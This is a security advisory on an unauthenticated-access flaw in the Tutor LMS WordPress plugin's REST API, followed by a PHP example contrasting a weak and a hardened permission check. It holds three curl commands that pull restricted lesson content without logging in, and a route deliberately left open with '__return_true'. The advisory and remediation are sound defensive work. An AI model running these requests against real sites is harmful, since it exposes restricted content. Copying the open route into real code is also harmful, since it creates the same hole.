wpexploit | A. S. M. Muhiminul Hasan | WPEX-ID: 3B6969A7-5CBC-4E16-8F27-5DDE481237F5
History: Jun 12, 2023 - 12:00 a.m.

Tutor LMS < 2.2.1 - Unauthenticated Access to Tutor LMS Lesson Resources via REST API

2023-06-12 00:00:00
A. S. M. Muhiminul Hasan
tutor lms
unauthenticated access
lesson resources

EPSS

0.002

Percentile

64.6%

The plugin does not implement adequate permission checks for REST API endpoints, allowing unauthenticated attackers to access information from Lessons that should not be publicly available.

1. Create a new Course, add a Topic, and add a Lesson to the Topic.
2. In Tutor LMS > Settings > Course, ensure that "Course Visibility" is toggled to "On" (students must be logged in to view the course).
3. Run the following curl command to get the ID of the course:

curl http://SITE_URL/wp-json/tutor/v1/courses

4. Using the Course ID, run the following curl command to get the ID of the Topic:

curl http://SITE_URL/wp-json/tutor/v1/course-topic/<course-id>

5. Using the Topic ID, run the following curl command to get all of the data from the Lesson, without being logged in:

curl http://SITE_URL/wp-json/tutor/v1/lesson/<topic-id>
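The root cause named above is a REST route whose permission check lets anyone through. The PHP below is an added illustration written for this page, not code from Tutor LMS or from the advisory author: it contrasts a route registered with a permissive `permission_callback` against one that refuses unauthenticated requests and then defers to WordPress capabilities. It uses only WordPress core REST API functions; the `example-lms` namespace, the `example_lms_course_login_required` option and the `example_lms_*` callbacks are hypothetical names chosen for the example.

```php
<?php
// Added example, not Tutor LMS code. Demonstrates an inadequate REST
// permission check beside a hardened one. Namespace, option name and
// callback names are hypothetical.

// WEAK: '__return_true' accepts every request, so lesson content is readable
// without logging in, regardless of any "students must be logged in" setting.
add_action( 'rest_api_init', function () {
    register_rest_route( 'example-lms-weak/v1', '/lesson/(?P<id>\d+)', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'example_lms_get_lesson',
        'permission_callback' => '__return_true', // no authorization at all
    ) );
} );

// HARDENED: require an authenticated user when the (hypothetical) course
// visibility option is on, then check the read_post capability for the object.
function example_lms_lesson_permission( WP_REST_Request $request ) {
    $lesson_id      = absint( $request['id'] );
    $login_required = (bool) get_option( 'example_lms_course_login_required', true );

    if ( $login_required && ! is_user_logged_in() ) {
        // rest_authorization_required_code() yields 401 for anonymous callers.
        return new WP_Error(
            'rest_forbidden',
            __( 'You must be logged in to view this lesson.' ),
            array( 'status' => rest_authorization_required_code() )
        );
    }

    if ( ! current_user_can( 'read_post', $lesson_id ) ) {
        return new WP_Error(
            'rest_forbidden',
            __( 'Sorry, you are not allowed to view this lesson.' ),
            array( 'status' => 403 )
        );
    }

    return true;
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'example-lms/v1', '/lesson/(?P<id>\d+)', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'example_lms_get_lesson',
        'permission_callback' => 'example_lms_lesson_permission',
        'args'                => array(
            'id' => array(
                // Reject non-numeric ids before the callback runs.
                'validate_callback' => function ( $value ) {
                    return is_numeric( $value );
                },
            ),
        ),
    ) );
} );

// Shared handler: returns the lesson post once the permission callback passed.
function example_lms_get_lesson( WP_REST_Request $request ) {
    $post = get_post( absint( $request['id'] ) );
    if ( ! $post ) {
        return new WP_Error( 'not_found', __( 'Lesson not found.' ), array( 'status' => 404 ) );
    }
    return rest_ensure_response( array(
        'id'      => $post->ID,
        'title'   => $post->post_title,
        'content' => $post->post_content,
    ) );
}
```

The important property of the hardened route is that authorization lives in `permission_callback`, which WordPress evaluates before the handler and before any response body is built; a check placed inside the handler, or one that only inspects the request URL, is easy to bypass or forget. When reviewing a plugin, every `register_rest_route` call whose `permission_callback` is `__return_true` (or absent, which WordPress warns about since 5.5) deserves the same question the advisory raises: is this data really meant to be public?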

